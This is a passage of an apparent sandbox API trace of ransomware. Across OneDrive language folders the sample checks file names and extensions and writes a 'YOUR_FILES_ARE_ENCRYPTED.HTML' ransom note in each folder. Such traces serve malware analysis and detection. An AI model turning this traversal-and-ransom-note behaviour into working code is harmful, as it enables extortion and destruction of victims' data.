nFileSizeHigh=0x0, nFileSizeLow=0x116b0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.951] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.952] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.952] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\wo\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\wo\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0162.952] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.954] CloseHandle (hObject=0x5b0) returned 1 [0162.954] GetProcessHeap () returned 0x270000 [0162.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.956] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd171b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="xh-za", cAlternateFileName="")) returned 1 [0162.956] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za") returned 77 [0162.956] GetProcessHeap () returned 0x270000 [0162.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.956] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za" [0162.956] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\*" [0162.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd171b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.958] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacbe66b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd171b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0162.958] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacd171b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd3d310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.958] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\FileSync.LocalizedResources.dll.mui") returned 113 [0162.959] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.959] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.959] lstrlenW (lpString=".mui") returned 4 [0162.959] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.959] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xacd171b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xacd171b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xacd3d310, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ab0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.959] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.964] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0162.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\xh-za\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\xh-za\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0162.973] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.252] CloseHandle (hObject=0x5b0) returned 1 [0163.252] GetProcessHeap () returned 0x270000 [0163.253] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.263] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacd3d310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="yo-ng", cAlternateFileName="")) returned 1 [0163.263] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng") returned 77 [0163.263] GetProcessHeap () returned 0x270000 [0163.263] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.265] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng" [0163.265] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\*" [0163.265] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacd3d310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.266] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xacd3d310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0a92b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.267] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad0a92b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0cf410, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.267] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.267] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.267] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.267] lstrlenW (lpString=".mui") returned 4 [0163.267] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.267] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad0a92b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad0a92b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad0cf410, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x122a8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.267] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.267] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\yo-ng\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\yo-ng\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.268] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.270] CloseHandle (hObject=0x5b0) returned 1 [0163.271] GetProcessHeap () returned 0x270000 [0163.272] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.272] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad0cf410, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zh-cn", cAlternateFileName="")) returned 1 [0163.272] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn") returned 77 [0163.272] GetProcessHeap () returned 0x270000 [0163.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.272] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn" [0163.272] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\*" [0163.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad0cf410, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.277] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad0cf410, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.277] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.277] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.277] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.277] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.277] lstrlenW (lpString=".mui") returned 4 [0163.277] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.277] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad226070, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad226070, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.277] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.278] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-cn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\zh-cn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.278] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.281] CloseHandle (hObject=0x5b0) returned 1 [0163.281] GetProcessHeap () returned 0x270000 [0163.282] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.282] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="zh-tw", cAlternateFileName="")) returned 1 [0163.282] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw") returned 77 [0163.282] GetProcessHeap () returned 0x270000 [0163.282] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0163.282] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw" [0163.282] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\*" [0163.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0163.283] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad226070, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0163.283] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0163.283] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\FileSync.LocalizedResources.dll.mui") returned 113 [0163.283] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.283] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.283] lstrlenW (lpString=".mui") returned 4 [0163.283] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0163.283] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xad356b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xad356b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xad356b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xbea8, dwReserved0=0xff83c1a2, dwReserved1=0xffffffff, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0163.283] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0163.283] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0163.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\zh-tw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\zh-tw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0163.284] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0163.286] CloseHandle (hObject=0x5b0) returned 1 [0163.287] GetProcessHeap () returned 0x270000 [0163.288] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0163.288] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xad356b70, 